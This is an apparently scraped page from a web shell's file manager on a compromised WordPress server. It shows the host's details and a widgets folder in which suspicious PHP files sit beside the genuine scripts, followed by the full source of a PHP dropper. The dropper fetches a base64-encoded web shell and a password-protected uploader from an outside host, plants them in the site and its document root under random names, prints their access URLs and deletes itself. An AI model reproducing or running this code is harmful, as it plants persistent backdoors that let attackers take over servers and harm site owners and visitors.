Linux newlinux5.pouyasazan.org 3.10.0-962.3.2.lve1.5.60.el7.x86_64 #1 SMP Fri Jul 23 07:07:00 EDT 2021 x86_64
LiteSpeed
Server IP : 88.99.66.243 & Your IP : 216.73.216.178
Domains :
Cant Read [ /etc/named.conf ]
User : wdbbsgxf
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
wdbbsgxf /
public_html /
wp-admin /
js /
widgets /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-rw-r--r--
2026-02-07 11:44
bCOUhZR.php
57.51
KB
-rw-r--r--
2026-01-06 06:52
bpxvwzgtgk.php
2.06
KB
-rw-r--r--
2026-02-07 07:29
custom-html-widgets.js
15.41
KB
-rw-r--r--
2024-07-17 07:15
custom-html-widgets.min.js
5.45
KB
-rw-r--r--
2024-07-17 07:15
media-audio-widget.js
4.18
KB
-rw-r--r--
2019-11-29 21:31
media-audio-widget.min.js
1.41
KB
-rw-r--r--
2022-04-09 00:37
media-gallery-widget.js
10.11
KB
-rw-r--r--
2019-11-29 21:31
media-gallery-widget.min.js
3.68
KB
-rw-r--r--
2022-04-09 00:37
media-image-widget.js
5.34
KB
-rw-r--r--
2019-11-29 21:31
media-image-widget.min.js
1.98
KB
-rw-r--r--
2021-01-06 18:59
media-video-widget.js
6.86
KB
-rw-r--r--
2019-11-29 21:31
media-video-widget.min.js
2.64
KB
-rw-r--r--
2023-02-02 20:06
media-widgets.js
41.86
KB
-rw-r--r--
2024-07-17 07:15
media-widgets.min.js
13.91
KB
-rw-r--r--
2024-07-17 07:15
text-widgets.js
17.63
KB
-rw-r--r--
2023-11-08 04:48
text-widgets.min.js
5.72
KB
-rw-r--r--
2023-11-08 04:48
ws58.php
1.49
MB
-rw-r--r--
2023-04-05 10:30
Save
Rename
<?php # 383634 $shell_encrypted = curl('https://bdkar.top/shl/fox-bdkr-shel.txt'); $shell = base64_decode($shell_encrypted); $link = str_replace(basename(__FILE__), '', 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']); $file1_name = mt_rand_str(8); // Generate random name for shell $file1 = 'BDKR28_' . $file1_name . '.php'; $file2_name = mt_rand_str(8); // Generate random name for uploader $file2 = $file2_name . '.php'; $password = mt_rand_str(4); $save = fopen($file1, 'w'); fwrite($save, $shell); fclose($save); $root_save = fopen($_SERVER['DOCUMENT_ROOT'] . '/BDKR28WP.php', 'w'); fwrite($root_save, $shell); fclose($root_save); $uploader = curl('https://bdkar.top/shl/uploader-pass.txt'); $uploader = str_replace('RANDOM_PASSWORD', $password, $uploader); $save = fopen($file2, 'w'); fwrite($save, $uploader); fclose($save); $txt_url = "https://bdkar.top/shl/bdkr.txt"; $txt_content = curl($txt_url); $txt_file = fopen("BDKR.txt", "w"); fwrite($txt_file, $txt_content); fclose($txt_file); function mt_rand_str($l, $c = 'abcdefghijklmnopqrstuvwxyz1234567890') { for ($s = '', $cl = strlen($c) - 1, $i = 0; $i < $l; $s .= $c[mt_rand(0, $cl)], ++$i); return $s; } function curl($url) { $html = file_get_contents($url); if (!empty($html)) { return $html; } $curl = curl_init(); curl_setopt($curl, CURLOPT_TIMEOUT, 40); curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE); if (stristr($url, "https://")) { curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); } curl_setopt($curl, CURLOPT_HEADER, false); return curl_exec($curl); } ?> <shell><font color="red"><center> Shell : <?php echo $link . $file1; ?></center></font><br></shell> <up><font color="green"><center> Up : <?php echo $link . $file2 . '?BDKR28=' . $password; ?></center></font><br></up> <?php unlink(__FILE__);